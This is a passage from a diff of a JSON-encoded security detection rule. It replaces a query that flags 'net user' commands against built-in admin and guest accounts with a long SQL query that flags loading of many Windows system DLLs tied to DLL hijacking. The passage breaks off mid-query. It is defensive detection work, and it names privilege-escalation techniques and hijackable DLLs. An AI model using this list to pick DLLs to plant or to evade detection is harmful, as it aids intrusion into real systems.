"attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR 